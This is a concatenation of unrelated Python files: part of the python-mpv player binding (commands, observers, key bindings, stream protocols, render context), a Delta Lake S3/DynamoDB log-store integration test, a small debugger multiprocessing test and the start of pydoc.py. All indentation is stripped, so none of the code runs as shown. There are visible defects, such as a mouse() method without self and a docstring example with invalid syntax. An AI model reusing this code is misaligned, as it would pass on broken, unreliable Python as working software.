raise UserWarning('terminate() should not be called from event thread (e.g. from a callback function). If '
'you want to terminate mpv from here, please call quit() instead, then sync the main thread '
'against the event thread using e.g. wait_for_shutdown(), then terminate() from the main thread. '
'This call has been transformed into a call to quit().')
self.quit()
else:
_mpv_terminate_destroy(handle)
if self._event_thread:
self._event_thread.join()
def set_loglevel(self, level):
"""Set MPV's log level. This adjusts which output will be sent to this object's log handlers. If you just want
mpv's regular terminal output, you don't need to adjust this but just need to pass a log handler to the MPV
constructur such as ``MPV(log_handler=print)``.
Valid log levels are "no", "fatal", "error", "warn", "info", "v" "debug" and "trace". For details see your mpv's
client.h header file.
"""
_mpv_request_log_messages(self._event_handle, level.encode('utf-8'))
def command(self, name, *args):
"""Execute a raw command."""
args = [name.encode('utf-8')] + [ (arg if type(arg) is bytes else str(arg).encode('utf-8'))
for arg in args if arg is not None ] + [None]
_mpv_command(self.handle, (c_char_p*len(args))(*args))
def node_command(self, name, *args, decoder=strict_decoder):
_1, _2, _3, pointer = _make_node_str_list([name, *args])
out = cast(create_string_buffer(sizeof(MpvNode)), POINTER(MpvNode))
ppointer = cast(pointer, POINTER(MpvNode))
_mpv_command_node(self.handle, ppointer, out)
rv = out.contents.node_value(decoder=decoder)
_mpv_free_node_contents(out)
return rv
def seek(self, amount, reference="relative", precision="default-precise"):
"""Mapped mpv seek command, see man mpv(1)."""
self.command('seek', amount, reference, precision)
def revert_seek(self):
"""Mapped mpv revert_seek command, see man mpv(1)."""
self.command('revert_seek');
def frame_step(self):
"""Mapped mpv frame-step command, see man mpv(1)."""
self.command('frame-step')
def frame_back_step(self):
"""Mapped mpv frame_back_step command, see man mpv(1)."""
self.command('frame_back_step')
def property_add(self, name, value=1):
"""Add the given value to the property's value. On overflow or underflow, clamp the property to the maximum. If
``value`` is omitted, assume ``1``.
"""
self.command('add', name, value)
def property_multiply(self, name, factor):
"""Multiply the value of a property with a numeric factor."""
self.command('multiply', name, factor)
def cycle(self, name, direction='up'):
"""Cycle the given property. ``up`` and ``down`` set the cycle direction. On overflow, set the property back to
the minimum, on underflow set it to the maximum. If ``up`` or ``down`` is omitted, assume ``up``.
"""
self.command('cycle', name, direction)
def screenshot(self, includes='subtitles', mode='single'):
"""Mapped mpv screenshot command, see man mpv(1)."""
self.command('screenshot', includes, mode)
def screenshot_to_file(self, filename, includes='subtitles'):
"""Mapped mpv screenshot_to_file command, see man mpv(1)."""
self.command('screenshot_to_file', filename.encode(fs_enc), includes)
def screenshot_raw(self, includes='subtitles'):
"""Mapped mpv screenshot_raw command, see man mpv(1). Returns a pillow Image object."""
from PIL import Image
res = self.node_command('screenshot-raw', includes)
if res['format'] != 'bgr0':
raise ValueError('Screenshot in unknown format "{}". Currently, only bgr0 is supported.'
.format(res['format']))
img = Image.frombytes('RGBA', (res['stride']//4, res['h']), res['data'])
b,g,r,a = img.split()
return Image.merge('RGB', (r,g,b))
def allocate_overlay_id(self):
free_ids = set(range(64)) - self.overlay_ids
if not free_ids:
raise IndexError('All overlay IDs are in use')
next_id, *_ = sorted(free_ids)
self.overlay_ids.add(next_id)
return next_id
def free_overlay_id(self, overlay_id):
self.overlay_ids.remove(overlay_id)
def create_file_overlay(self, filename=None, size=None, stride=None, pos=(0,0)):
overlay_id = self.allocate_overlay_id()
overlay = FileOverlay(self, overlay_id, filename, size, stride, pos)
self.overlays[overlay_id] = overlay
return overlay
def create_image_overlay(self, img=None, pos=(0,0)):
overlay_id = self.allocate_overlay_id()
overlay = ImageOverlay(self, overlay_id, img, pos)
self.overlays[overlay_id] = overlay
return overlay
def remove_overlay(self, overlay_id):
self.overlay_remove(overlay_id)
self.free_overlay_id(overlay_id)
del self.overlays[overlay_id]
def playlist_next(self, mode='weak'):
"""Mapped mpv playlist_next command, see man mpv(1)."""
self.command('playlist_next', mode)
def playlist_prev(self, mode='weak'):
"""Mapped mpv playlist_prev command, see man mpv(1)."""
self.command('playlist_prev', mode)
def playlist_play_index(self, idx):
"""Mapped mpv playlist-play-index command, see man mpv(1)."""
self.command('playlist-play-index', idx)
@staticmethod
def _encode_options(options):
return ','.join('{}={}'.format(_py_to_mpv(str(key)), str(val)) for key, val in options.items())
def loadfile(self, filename, mode='replace', **options):
"""Mapped mpv loadfile command, see man mpv(1)."""
self.command('loadfile', filename.encode(fs_enc), mode, MPV._encode_options(options))
def loadlist(self, playlist, mode='replace'):
"""Mapped mpv loadlist command, see man mpv(1)."""
self.command('loadlist', playlist.encode(fs_enc), mode)
def playlist_clear(self):
"""Mapped mpv playlist_clear command, see man mpv(1)."""
self.command('playlist_clear')
def playlist_remove(self, index='current'):
"""Mapped mpv playlist_remove command, see man mpv(1)."""
self.command('playlist_remove', index)
def playlist_move(self, index1, index2):
"""Mapped mpv playlist_move command, see man mpv(1)."""
self.command('playlist_move', index1, index2)
def playlist_shuffle(self):
"""Mapped mpv playlist-shuffle command, see man mpv(1)."""
self.command('playlist-shuffle')
def playlist_unshuffle(self):
"""Mapped mpv playlist-unshuffle command, see man mpv(1)."""
self.command('playlist-unshuffle')
def run(self, command, *args):
"""Mapped mpv run command, see man mpv(1)."""
self.command('run', command, *args)
def quit(self, code=None):
"""Mapped mpv quit command, see man mpv(1)."""
self.command('quit', code)
def quit_watch_later(self, code=None):
"""Mapped mpv quit_watch_later command, see man mpv(1)."""
self.command('quit_watch_later', code)
def stop(self, keep_playlist=False):
"""Mapped mpv stop command, see man mpv(1)."""
if keep_playlist:
self.command('stop', 'keep-playlist')
else:
self.command('stop')
def audio_add(self, url, flags='select', title=None, lang=None):
"""Mapped mpv audio_add command, see man mpv(1)."""
self.command('audio_add', url.encode(fs_enc), *_drop_nones(flags, title, lang))
def audio_remove(self, audio_id=None):
"""Mapped mpv audio_remove command, see man mpv(1)."""
self.command('audio_remove', audio_id)
def audio_reload(self, audio_id=None):
"""Mapped mpv audio_reload command, see man mpv(1)."""
self.command('audio_reload', audio_id)
def video_add(self, url, flags='select', title=None, lang=None):
"""Mapped mpv video_add command, see man mpv(1)."""
self.command('video_add', url.encode(fs_enc), *_drop_nones(flags, title, lang))
def video_remove(self, video_id=None):
"""Mapped mpv video_remove command, see man mpv(1)."""
self.command('video_remove', video_id)
def video_reload(self, video_id=None):
"""Mapped mpv video_reload command, see man mpv(1)."""
self.command('video_reload', video_id)
def sub_add(self, url, flags='select', title=None, lang=None):
"""Mapped mpv sub_add command, see man mpv(1)."""
self.command('sub_add', url.encode(fs_enc), *_drop_nones(flags, title, lang))
def sub_remove(self, sub_id=None):
"""Mapped mpv sub_remove command, see man mpv(1)."""
self.command('sub_remove', sub_id)
def sub_reload(self, sub_id=None):
"""Mapped mpv sub_reload command, see man mpv(1)."""
self.command('sub_reload', sub_id)
def sub_step(self, skip):
"""Mapped mpv sub_step command, see man mpv(1)."""
self.command('sub_step', skip)
def sub_seek(self, skip):
"""Mapped mpv sub_seek command, see man mpv(1)."""
self.command('sub_seek', skip)
def toggle_osd(self):
"""Mapped mpv osd command, see man mpv(1)."""
self.command('osd')
def print_text(self, text):
"""Mapped mpv print-text command, see man mpv(1)."""
self.command('print-text', text)
def show_text(self, string, duration='-1', level=None):
"""Mapped mpv show_text command, see man mpv(1)."""
self.command('show_text', string, duration, level)
def expand_text(self, text):
"""Mapped mpv expand-text command, see man mpv(1)."""
return self.node_command('expand-text', text)
def expand_path(self, path):
"""Mapped mpv expand-path command, see man mpv(1)."""
return self.node_command('expand-path', path)
def show_progress(self):
"""Mapped mpv show_progress command, see man mpv(1)."""
self.command('show_progress')
def rescan_external_files(self, mode='reselect'):
"""Mapped mpv rescan-external-files command, see man mpv(1)."""
self.command('rescan-external-files', mode)
def discnav(self, command):
"""Mapped mpv discnav command, see man mpv(1)."""
self.command('discnav', command)
def mouse(x, y, button=None, mode='single'):
"""Mapped mpv mouse command, see man mpv(1)."""
if button is None:
self.command('mouse', x, y, mode)
else:
self.command('mouse', x, y, button, mode)
def keypress(self, name):
"""Mapped mpv keypress command, see man mpv(1)."""
self.command('keypress', name)
def keydown(self, name):
"""Mapped mpv keydown command, see man mpv(1)."""
self.command('keydown', name)
def keyup(self, name=None):
"""Mapped mpv keyup command, see man mpv(1)."""
if name is None:
self.command('keyup')
else:
self.command('keyup', name)
def keybind(self, name, command):
"""Mapped mpv keybind command, see man mpv(1)."""
self.command('keybind', name, command)
def write_watch_later_config(self):
"""Mapped mpv write_watch_later_config command, see man mpv(1)."""
self.command('write_watch_later_config')
def overlay_add(self, overlay_id, x, y, file_or_fd, offset, fmt, w, h, stride):
"""Mapped mpv overlay_add command, see man mpv(1)."""
self.command('overlay_add', overlay_id, x, y, file_or_fd, offset, fmt, w, h, stride)
def overlay_remove(self, overlay_id):
"""Mapped mpv overlay_remove command, see man mpv(1)."""
self.command('overlay_remove', overlay_id)
def script_message(self, *args):
"""Mapped mpv script_message command, see man mpv(1)."""
self.command('script_message', *args)
def script_message_to(self, target, *args):
"""Mapped mpv script_message_to command, see man mpv(1)."""
self.command('script_message_to', target, *args)
def observe_property(self, name, handler):
"""Register an observer on the named property. An observer is a function that is called with the new property
value every time the property's value is changed. The basic function signature is ``fun(property_name,
new_value)`` with new_value being the decoded property value as a python object. This function can be used as a
function decorator if no handler is given.
To unregister the observer, call either of ``mpv.unobserve_property(name, handler)``,
``mpv.unobserve_all_properties(handler)`` or the handler's ``unregister_mpv_properties`` attribute::
@player.observe_property('volume')
def my_handler(new_volume, *):
print("It's loud!", volume)
my_handler.unregister_mpv_properties()
exit_handler is a function taking no arguments that is called when the underlying mpv handle is terminated (e.g.
from calling MPV.terminate() or issuing a "quit" input command).
"""
self._property_handlers[name].append(handler)
_mpv_observe_property(self._event_handle, hash(name)&0xffffffffffffffff, name.encode('utf-8'), MpvFormat.NODE)
def property_observer(self, name):
"""Function decorator to register a property observer. See ``MPV.observe_property`` for details."""
def wrapper(fun):
self.observe_property(name, fun)
fun.unobserve_mpv_properties = lambda: self.unobserve_property(name, fun)
return fun
return wrapper
def unobserve_property(self, name, handler):
"""Unregister a property observer. This requires both the observed property's name and the handler function that
was originally registered as one handler could be registered for several properties. To unregister a handler
from *all* observed properties see ``unobserve_all_properties``.
"""
self._property_handlers[name].remove(handler)
if not self._property_handlers[name]:
_mpv_unobserve_property(self._event_handle, hash(name)&0xffffffffffffffff)
def unobserve_all_properties(self, handler):
"""Unregister a property observer from *all* observed properties."""
for name in self._property_handlers:
self.unobserve_property(name, handler)
def register_message_handler(self, target, handler=None):
"""Register a mpv script message handler. This can be used to communicate with embedded lua scripts. Pass the
script message target name this handler should be listening to and the handler function.
WARNING: Only one handler can be registered at a time for any given target.
To unregister the message handler, call its ``unregister_mpv_messages`` function::
player = mpv.MPV()
@player.message_handler('foo')
def my_handler(some, args):
print(args)
my_handler.unregister_mpv_messages()
"""
self._register_message_handler_internal(target, handler)
def _register_message_handler_internal(self, target, handler):
self._message_handlers[target] = handler
def unregister_message_handler(self, target_or_handler):
"""Unregister a mpv script message handler for the given script message target name.
You can also call the ``unregister_mpv_messages`` function attribute set on the handler function when it is
registered.
"""
if isinstance(target_or_handler, str):
del self._message_handlers[target_or_handler]
else:
for key, val in self._message_handlers.items():
if val == target_or_handler:
del self._message_handlers[key]
def message_handler(self, target):
"""Decorator to register a mpv script message handler.
WARNING: Only one handler can be registered at a time for any given target.
To unregister the message handler, call its ``unregister_mpv_messages`` function::
player = mpv.MPV()
@player.message_handler('foo')
def my_handler(some, args):
print(args)
my_handler.unregister_mpv_messages()
"""
def register(handler):
self._register_message_handler_internal(target, handler)
handler.unregister_mpv_messages = lambda: self.unregister_message_handler(handler)
return handler
return register
def register_event_callback(self, callback):
"""Register a blanket event callback receiving all event types.
To unregister the event callback, call its ``unregister_mpv_events`` function::
player = mpv.MPV()
@player.event_callback('shutdown')
def my_handler(event):
print('It ded.')
my_handler.unregister_mpv_events()
"""
self._event_callbacks.append(callback)
def unregister_event_callback(self, callback):
"""Unregiser an event callback."""
self._event_callbacks.remove(callback)
def event_callback(self, *event_types):
"""Function decorator to register a blanket event callback for the given event types. Event types can be given
as str (e.g. 'start-file'), integer or MpvEventID object.
WARNING: Due to the way this is filtering events, this decorator cannot be chained with itself.
To unregister the event callback, call its ``unregister_mpv_events`` function::
player = mpv.MPV()
@player.event_callback('shutdown')
def my_handler(event):
print('It ded.')
my_handler.unregister_mpv_events()
"""
def register(callback):
with self._event_handler_lock:
self.check_core_alive()
types = [MpvEventID.from_str(t) if isinstance(t, str) else t for t in event_types] or MpvEventID.ANY
@wraps(callback)
def wrapper(event, *args, **kwargs):
if event['event_id'] in types:
callback(event, *args, **kwargs)
self._event_callbacks.append(wrapper)
wrapper.unregister_mpv_events = partial(self.unregister_event_callback, wrapper)
return wrapper
return register
@staticmethod
def _binding_name(callback_or_cmd):
return 'py_kb_{:016x}'.format(hash(callback_or_cmd)&0xffffffffffffffff)
def on_key_press(self, keydef, mode='force'):
"""Function decorator to register a simplified key binding. The callback is called whenever the key given is
*pressed*.
To unregister the callback function, you can call its ``unregister_mpv_key_bindings`` attribute::
player = mpv.MPV()
@player.on_key_press('Q')
def binding():
print('blep')
binding.unregister_mpv_key_bindings()
WARNING: For a single keydef only a single callback/command can be registered at the same time. If you register
a binding multiple times older bindings will be overwritten and there is a possibility of references leaking. So
don't do that.
The BIG FAT WARNING regarding untrusted keydefs from the key_binding method applies here as well.
"""
def register(fun):
@self.key_binding(keydef, mode)
@wraps(fun)
def wrapper(state='p-', name=None, char=None):
if state[0] in ('d', 'p'):
fun()
return wrapper
return register
def key_binding(self, keydef, mode='force'):
"""Function decorator to register a low-level key binding.
The callback function signature is ``fun(key_state, key_name)`` where ``key_state`` is either ``'U'`` for "key
up" or ``'D'`` for "key down".
The keydef format is: ``[Shift+][Ctrl+][Alt+][Meta+]<key>`` where ``<key>`` is either the literal character the
key produces (ASCII or Unicode character), or a symbolic name (as printed by ``mpv --input-keylist``).
To unregister the callback function, you can call its ``unregister_mpv_key_bindings`` attribute::
player = mpv.MPV()
@player.key_binding('Q')
def binding(state, name, char):
print('blep')
binding.unregister_mpv_key_bindings()
WARNING: For a single keydef only a single callback/command can be registered at the same time. If you register
a binding multiple times older bindings will be overwritten and there is a possibility of references leaking. So
don't do that.
BIG FAT WARNING: mpv's key binding mechanism is pretty powerful. This means, you essentially get arbitrary code
exectution through key bindings. This interface makes some limited effort to sanitize the keydef given in the
first parameter, but YOU SHOULD NOT RELY ON THIS IN FOR SECURITY. If your input comes from config files, this is
completely fine--but, if you are about to pass untrusted input into this parameter, better double-check whether
this is secure in your case.
"""
def register(fun):
fun.mpv_key_bindings = getattr(fun, 'mpv_key_bindings', []) + [keydef]
def unregister_all():
for keydef in fun.mpv_key_bindings:
self.unregister_key_binding(keydef)
fun.unregister_mpv_key_bindings = unregister_all
self.register_key_binding(keydef, fun, mode)
return fun
return register
def register_key_binding(self, keydef, callback_or_cmd, mode='force'):
"""Register a key binding. This takes an mpv keydef and either a string containing a mpv command or a python
callback function. See ``MPV.key_binding`` for details.
"""
if not re.match(r'(Shift+)?(Ctrl+)?(Alt+)?(Meta+)?(.|\w+)', keydef):
raise ValueError('Invalid keydef. Expected format: [Shift+][Ctrl+][Alt+][Meta+]<key>\n'
'<key> is either the literal character the key produces (ASCII or Unicode character), or a '
'symbolic name (as printed by --input-keylist')
binding_name = MPV._binding_name(keydef)
if callable(callback_or_cmd):
self._key_binding_handlers[binding_name] = callback_or_cmd
self.register_message_handler('key-binding', self._handle_key_binding_message)
self.command('define-section',
binding_name, '{} script-binding py_event_handler/{}'.format(keydef, binding_name), mode)
elif isinstance(callback_or_cmd, str):
self.command('define-section', binding_name, '{} {}'.format(keydef, callback_or_cmd), mode)
else:
raise TypeError('register_key_binding expects either an str with an mpv command or a python callable.')
self.command('enable-section', binding_name, 'allow-hide-cursor+allow-vo-dragging')
def _handle_key_binding_message(self, binding_name, key_state, key_name=None, key_char=None):
self._key_binding_handlers[binding_name](key_state, key_name, key_char)
def unregister_key_binding(self, keydef):
"""Unregister a key binding by keydef."""
binding_name = MPV._binding_name(keydef)
self.command('disable-section', binding_name)
self.command('define-section', binding_name, '')
if binding_name in self._key_binding_handlers:
del self._key_binding_handlers[binding_name]
if not self._key_binding_handlers:
self.unregister_message_handler('key-binding')
def register_stream_protocol(self, proto, open_fn=None):
""" Register a custom stream protocol as documented in libmpv/stream_cb.h:
https://github.com/mpv-player/mpv/blob/master/libmpv/stream_cb.h
proto is the protocol scheme, e.g. "foo" for "foo://" urls.
This function can either be used with two parameters or it can be used as a decorator on the target
function.
open_fn is a function taking an URI string and returning an mpv stream object.
open_fn may raise a ValueError to signal libmpv the URI could not be opened.
The mpv stream protocol is as follows:
class Stream:
@property
def size(self):
return None # unknown size
return size # int with size in bytes
def read(self, size):
...
return read # non-empty bytes object with input
return b'' # empty byte object signals permanent EOF
def seek(self, pos):
return new_offset # integer with new byte offset. The new offset may be before the requested offset
in case an exact seek is inconvenient.
def close(self):
...
# def cancel(self): (future API versions only)
# Abort a running read() or seek() operation
# ...
"""
def decorator(open_fn):
@StreamOpenFn
def open_backend(_userdata, uri, cb_info):
try:
frontend = open_fn(uri.decode('utf-8'))
except ValueError:
return ErrorCode.LOADING_FAILED
def read_backend(_userdata, buf, bufsize):
data = frontend.read(bufsize)
for i in range(len(data)):
buf[i] = data[i]
return len(data)
cb_info.contents.cookie = None
read = cb_info.contents.read = StreamReadFn(read_backend)
close = cb_info.contents.close = StreamCloseFn(lambda _userdata: frontend.close())
seek, size, cancel = None, None, None
if hasattr(frontend, 'seek'):
seek = cb_info.contents.seek = StreamSeekFn(lambda _userdata, offx: frontend.seek(offx))
if hasattr(frontend, 'size') and frontend.size is not None:
size = cb_info.contents.size = StreamSizeFn(lambda _userdata: frontend.size)
# Future API versions only
# if hasattr(frontend, 'cancel'):
# cb_info.contents.cancel = StreamCancelFn(lambda _userdata: frontend.cancel())
# keep frontend and callbacks in memory forever (TODO)
frontend._registered_callbacks = [read, close, seek, size, cancel]
self._stream_protocol_frontends[proto][uri] = frontend
return 0
if proto in self._stream_protocol_cbs:
raise KeyError('Stream protocol already registered')
self._stream_protocol_cbs[proto] = [open_backend]
_mpv_stream_cb_add_ro(self.handle, proto.encode('utf-8'), c_void_p(), open_backend)
return open_fn
if open_fn is not None:
decorator(open_fn)
return decorator
# Convenience functions
def play(self, filename):
"""Play a path or URL (requires ``ytdl`` option to be set)."""
self.loadfile(filename)
@property
def playlist_filenames(self):
"""Return all playlist item file names/URLs as a list of strs."""
return [element['filename'] for element in self.playlist]
def playlist_append(self, filename, **options):
"""Append a path or URL to the playlist. This does not start playing the file automatically. To do that, use
``MPV.loadfile(filename, 'append-play')``."""
self.loadfile(filename, 'append', **options)
# "Python stream" logic. This is some porcelain for directly playing data from python generators.
def _python_stream_open(self, uri):
"""Internal handler for python:// protocol streams registered through @python_stream(...) and
@python_stream_catchall
"""
name, = re.fullmatch('python://(.*)', uri).groups()
if name in self._python_streams:
generator_fun, size = self._python_streams[name]
else:
if self._python_stream_catchall is not None:
generator_fun, size = self._python_stream_catchall(name)
else:
raise ValueError('Python stream name not found and no catch-all defined')
return GeneratorStream(generator_fun, size)
def python_stream(self, name=None, size=None):
"""Register a generator for the python stream with the given name.
name is the name, i.e. the part after the "python://" in the URI, that this generator is registered as.
size is the total number of bytes in the stream (if known).
Any given name can only be registered once. The catch-all can also only be registered once. To unregister a
stream, call the .unregister function set on the callback.
The generator signals EOF by returning, manually raising StopIteration or by yielding b'', an empty bytes
object.
The generator may be called multiple times if libmpv seeks or loops.
See also: @mpv.python_stream_catchall
@mpv.python_stream('foobar')
def reader():
for chunk in chunks:
yield chunk
mpv.play('python://foobar')
mpv.wait_for_playback()
reader.unregister()
"""
def register(cb):
if name in self._python_streams:
raise KeyError('Python stream name "{}" is already registered'.format(name))
self._python_streams[name] = (cb, size)
def unregister():
if name not in self._python_streams or\
self._python_streams[name][0] is not cb: # This is just a basic sanity check
raise RuntimeError('Python stream has already been unregistered')
del self._python_streams[name]
cb.unregister = unregister
return cb
return register
def python_stream_catchall(self, cb):
""" Register a catch-all python stream to be called when no name matches can be found. Use this decorator on a
function that takes a name argument and returns a (generator, size) tuple (with size being None if unknown).
An invalid URI can be signalled to libmpv by raising a ValueError inside the callback.
See also: @mpv.python_stream(name, size)
@mpv.python_stream_catchall
def catchall(name):
if not name.startswith('foo'):
raise ValueError('Unknown Name')
def foo_reader():
with open(name, 'rb') as f:
while True:
chunk = f.read(1024)
if not chunk:
break
yield chunk
return foo_reader, None
mpv.play('python://foo23')
mpv.wait_for_playback()
catchall.unregister()
"""
if self._python_stream_catchall is not None:
raise KeyError('A catch-all python stream is already registered')
self._python_stream_catchall = cb
def unregister():
if self._python_stream_catchall is not cb:
raise RuntimeError('This catch-all python stream has already been unregistered')
self._python_stream_catchall = None
cb.unregister = unregister
return cb
# Property accessors
def _get_property(self, name, decoder=strict_decoder, fmt=MpvFormat.NODE):
self.check_core_alive()
out = create_string_buffer(sizeof(MpvNode))
try:
cval = _mpv_get_property(self.handle, name.encode('utf-8'), fmt, out)
if fmt is MpvFormat.OSD_STRING:
return cast(out, POINTER(c_char_p)).contents.value.decode('utf-8')
elif fmt is MpvFormat.NODE:
rv = cast(out, POINTER(MpvNode)).contents.node_value(decoder=decoder)
_mpv_free_node_contents(out)
return rv
else:
raise TypeError('_get_property only supports NODE and OSD_STRING formats.')
except PropertyUnavailableError as ex:
return None
def _set_property(self, name, value):
self.check_core_alive()
ename = name.encode('utf-8')
if isinstance(value, (list, set, dict)):
_1, _2, _3, pointer = _make_node_str_list(value)
_mpv_set_property(self.handle, ename, MpvFormat.NODE, pointer)
else:
_mpv_set_property_string(self.handle, ename, _mpv_coax_proptype(value))
def __getattr__(self, name):
return self._get_property(_py_to_mpv(name), lazy_decoder)
def __setattr__(self, name, value):
try:
if name != 'handle' and not name.startswith('_'):
self._set_property(_py_to_mpv(name), value)
else:
super().__setattr__(name, value)
except AttributeError:
super().__setattr__(name, value)
def __dir__(self):
return super().__dir__() + [ name.replace('-', '_') for name in self.property_list ]
@property
def properties(self):
return { name: self.option_info(name) for name in self.property_list }
# Dict-like option access
def __getitem__(self, name, file_local=False):
"""Get an option value."""
prefix = 'file-local-options/' if file_local else 'options/'
return self._get_property(prefix+name, lazy_decoder)
def __setitem__(self, name, value, file_local=False):
"""Set an option value."""
prefix = 'file-local-options/' if file_local else 'options/'
return self._set_property(prefix+name, value)
def __iter__(self):
"""Iterate over all option names."""
return iter(self.options)
def option_info(self, name):
"""Get information on the given option."""
try:
return self._get_property('option-info/'+name)
except AttributeError:
return None
class MpvRenderContext:
def __init__(self, mpv, api_type, **kwargs):
self._mpv = mpv
kwargs['api_type'] = api_type
buf = cast(create_string_buffer(sizeof(MpvRenderCtxHandle)), POINTER(MpvRenderCtxHandle))
_mpv_render_context_create(buf, mpv.handle, kwargs_to_render_param_array(kwargs))
self._handle = buf.contents
def free(self):
_mpv_render_context_free(self._handle)
def __setattr__(self, name, value):
if name.startswith('_'):
super().__setattr__(name, value)
elif name == 'update_cb':
func = value if value else (lambda: None)
self._update_cb = value
self._update_fn_wrapper = RenderUpdateFn(lambda _userdata: func())
_mpv_render_context_set_update_callback(self._handle, self._update_fn_wrapper, None)
else:
param = MpvRenderParam(name, value)
_mpv_render_context_set_parameter(self._handle, param)
def __getattr__(self, name):
if name == 'update_cb':
return self._update_cb
elif name == 'handle':
return self._handle
param = MpvRenderParam(name)
data_type = type(param.data.contents)
buf = cast(create_string_buffer(sizeof(data_type)), POINTER(data_type))
param.data = buf
_mpv_render_context_get_info(self._handle, param)
return buf.contents.as_dict()
def update(self):
""" Calls mpv_render_context_update and returns the MPV_RENDER_UPDATE_FRAME flag (see render.h) """
return bool(_mpv_render_context_update(self._handle) & 1)
def render(self, **kwargs):
_mpv_render_context_render(self._handle, kwargs_to_render_param_array(kwargs))
def report_swap(self):
_mpv_render_context_report_swap(self._handle)
|
dynamodb_logstore.py
|
#
# Copyright (2021) The Delta Lake Project Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import threading
from pyspark.sql import SparkSession
from multiprocessing.pool import ThreadPool
import time
"""
Create required dynamodb table with:
$ aws --region us-west-2 dynamodb create-table \
--table-name delta_log_test \
--attribute-definitions AttributeName=tablePath,AttributeType=S \
AttributeName=fileName,AttributeType=S \
--key-schema AttributeName=tablePath,KeyType=HASH \
AttributeName=fileName,KeyType=RANGE \
--provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5
Run this script in root dir of repository:
export VERSION=$(cat version.sbt|cut -d '"' -f 2)
export DELTA_CONCURRENT_WRITERS=2
export DELTA_CONCURRENT_READERS=2
export DELTA_TABLE_PATH=s3a://test-bucket/delta-test/
export DELTA_DYNAMO_TABLE=delta_log_test
export DELTA_DYNAMO_REGION=us-west-2
export DELTA_STORAGE=io.delta.storage.S3DynamoDBLogStore
export DELTA_NUM_ROWS=16
./run-integration-tests.py --run-storage-s3-dynamodb-integration-tests \
--dbb-packages org.apache.hadoop:hadoop-aws:3.3.1,com.amazonaws:aws-java-sdk-bundle:1.12.142 \
--dbb-conf spark.jars.ivySettings=/workspace/ivy.settings \
spark.driver.extraJavaOptions=-Dlog4j.configuration=file:debug/log4j.properties
"""
# conf
delta_table_path = os.environ.get("DELTA_TABLE_PATH")
concurrent_writers = int(os.environ.get("DELTA_CONCURRENT_WRITERS", 2))
concurrent_readers = int(os.environ.get("DELTA_CONCURRENT_READERS", 2))
num_rows = int(os.environ.get("DELTA_NUM_ROWS", 16))
# className to instantiate. io.delta.storage.S3DynamoDBLogStore or .FailingS3DynamoDBLogStore
delta_storage = os.environ.get("DELTA_STORAGE", "io.delta.storage.S3DynamoDBLogStore")
dynamo_table_name = os.environ.get("DELTA_DYNAMO_TABLE", "delta_log_test")
dynamo_region = os.environ.get("DELTA_DYNAMO_REGION", "us-west-2")
dynamo_error_rates = os.environ.get("DELTA_DYNAMO_ERROR_RATES", "")
if delta_table_path is None:
print(f"\nSkipping Python test {os.path.basename(__file__)} due to the missing env variable "
f"`DELTA_TABLE_PATH`\n=====================")
sys.exit(0)
test_log = f"""
--- LOG ---\n
delta table path: {delta_table_path}
concurrent writers: {concurrent_writers}
concurrent readers: {concurrent_readers}
number of rows: {num_rows}
delta storage: {delta_storage}
dynamo table name: {dynamo_table_name}
{"dynamo_error_rates: {}".format(dynamo_error_rates) if dynamo_error_rates else ""}
=====================
"""
print(test_log)
spark = SparkSession \
.builder \
.appName("utilities") \
.master("local[*]") \
.config("spark.sql.extensions", "io.delta.sql.DeltaSparkSessionExtension") \
.config("spark.delta.logStore.class", delta_storage) \
.config("io.delta.storage.ddb.tableName", dynamo_table_name) \
.config("io.delta.storage.ddb.region", dynamo_region) \
.config("io.delta.storage.errorRates", dynamo_error_rates) \
.getOrCreate()
# spark.sparkContext.setLogLevel("INFO")
data = spark.createDataFrame([], "id: int, a: int")
data.write.format("delta").mode("overwrite").partitionBy("id").save(delta_table_path)
def write_tx(n):
data = spark.createDataFrame([[n, n]], "id: int, a: int")
data.write.format("delta").mode("append").partitionBy("id").save(delta_table_path)
stop_reading = threading.Event()
def read_data():
while not stop_reading.is_set():
print("Reading {:d} rows ...".format(
spark.read.format("delta").load(delta_table_path).distinct().count())
)
time.sleep(1)
def start_read_thread():
thread = threading.Thread(target=read_data)
thread.start()
return thread
read_threads = [start_read_thread() for i in range(concurrent_readers)]
pool = ThreadPool(concurrent_writers)
start_t = time.time()
pool.map(write_tx, range(num_rows))
stop_reading.set()
for thread in read_threads:
thread.join()
actual = spark.read.format("delta").load(delta_table_path).distinct().count()
print("Number of written rows:", actual)
assert actual == num_rows
t = time.time() - start_t
print(f"{num_rows / t:.02f} tx / sec")
import boto3
from botocore.config import Config
my_config = Config(
region_name=dynamo_region,
)
dynamodb = boto3.resource('dynamodb', config=my_config)
table = dynamodb.Table(dynamo_table_name) # this ensures we actually used/created the input table
response = table.scan()
items = response['Items']
print(items[-1]) # print for manual validation
|
_debugger_case_multiprocessing.py
|
import multiprocessing
import sys
def run(name):
print("argument: ", name) # break 1 here
if __name__ == '__main__':
if sys.version_info[0] >= 3 and sys.platform != 'win32':
multiprocessing.set_start_method('fork')
p = multiprocessing.Process(target=run, args=("argument to run method",))
p.start()
print('TEST SUCEEDED!') # break 2 here
p.join()
|
pydoc.py
|
#!/usr/bin/env python
# -*- coding: Latin-1 -*-
"""Generate Python documentation in HTML or text for interactive use.
In the Python interpreter, do "from pydoc import help" to provide online
help. Calling help(thing) on a Python object documents the object.
Or, at the shell command line outside of Python:
Run "pydoc <name>" to show documentation on something. <name> may be
the name of a function, module, package, or a dotted reference to a
class or function within a module or module in a package. If the
argument contains a path segment delimiter (e.g. slash on Unix,
backslash on Windows) it is treated as the path to a Python source file.
Run "pydoc -k <keyword>" to search for a keyword in the synopsis lines
of all available modules.
Run "pydoc -p <port>" to start an HTTP server on a given port on the
local machine to generate documentation web pages.
For platforms without a command line, "pydoc -g" starts the HTTP server
and also pops up a little window for controlling it.
Run "pydoc -w <name>" to write out the HTML documentation for a module
to a file named "<name>.html".
Module docs for core modules are assumed to be in
http://www.python.org/doc/current/lib/
This can be overridden by setting the PYTHONDOCS environment variable
to a different URL or to a local directory containing the Library
Reference Manual pages.
"""
__author__ = "Ka-Ping Yee <ping@lfw.org>"
__date__ = "26 February 2001"
__version__ = "$Revision: 1.100.2.4 $"
